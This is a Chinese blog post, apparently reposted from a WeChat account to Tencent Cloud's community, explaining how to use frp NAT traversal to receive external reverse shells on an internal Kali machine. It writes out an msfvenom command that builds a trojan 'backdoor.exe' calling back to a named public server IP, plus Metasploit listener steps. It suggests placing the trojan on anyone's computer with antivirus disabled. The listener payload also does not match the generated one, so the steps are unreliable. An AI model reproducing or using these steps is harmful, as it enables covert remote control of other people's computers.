前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >内网接收外网shell(内网穿透)

内网接收外网shell(内网穿透)

作者头像
网e渗透安全部
发布2022-12-01 15:26:18
1.4K0
发布2022-12-01 15:26:18
举报
文章被收录于专栏:白安全组

前言:

内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。

工具:

我们到官网上下载就好了:

代码语言:javascript
复制
https://github.com/fatedier/frp/releases 

我这里下载的是最新版,当然我们还需要准备一台服务器,腾讯云什么就好

轻量级就可以了,当然你也可以用自己的物理机(shell的接收是虚拟机中的kali)

轻量级就可以了,当然你也可以用自己的物理机(shell的接收是虚拟机中的kali)

最后就是准备一台kali和msf了。

正文:

步骤其实很简单,我们首先将下好的frp传到服务器和kali中,解压(不会的百度)

这是服务器的

这是Kali中的

然后我们就可以开始修改配置文件了,kali这边属于客户端,主要用的是frpc,所以我们配置frpc.ini这个配置文件就好了。

我们修改一个server_addr这里的IP,换成服务器的IP

然后我们还需要加上msf用的端口

直接加在这下面就好,名字随意,4445这个端口也可以随意,但是要记住后面要用

然后其他的不变,这里需要注意一点,服务器的安全组策略需要将7000,8000和6000三个开启,这里以腾讯云举例

添加三个即可

这样我们到服务器中,启动服务器中的frps

首先我们要给一个执行权限:

代码语言:javascript
复制
chmod +x frps

然后启动:

代码语言:javascript
复制
./frps -c ./frps.ini

这里启动成功了,我们到kali中启动,注意顺序,服务端要先开不然没用

Kali中也是一样先加上执行权限:

代码语言:javascript
复制
chmod +x frpc

然后启动:

代码语言:javascript
复制
./frpc -c ./frpc.ini

这样两边就都启动成功了。(这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识)

我们需要生成一下木马文件

代码语言:javascript
复制
msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=101.43.1.181 LPORT=8000 -f exe -o backdoor.exe

-o选择文件名,ip地址选择外网服务器的地址 端口选择8000

下载到桌面

我这里用xshell来实现

然后我们打开msf开启监听

启动:

代码语言:javascript
复制
msfdb run

使用:

代码语言:javascript
复制
use exploit/multi/handler 

选择payload:

代码语言:javascript
复制
set payload windows/meterpreter/reverse_tcp

设置IP和端口

然后我们生成就好,放到任意谁的电脑上,但是要关杀软,因为我们没加免杀,Windows自带的检测也要关闭

运行后成功外网上线

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-09-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 前言:
  • 工具:
  • 正文:
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档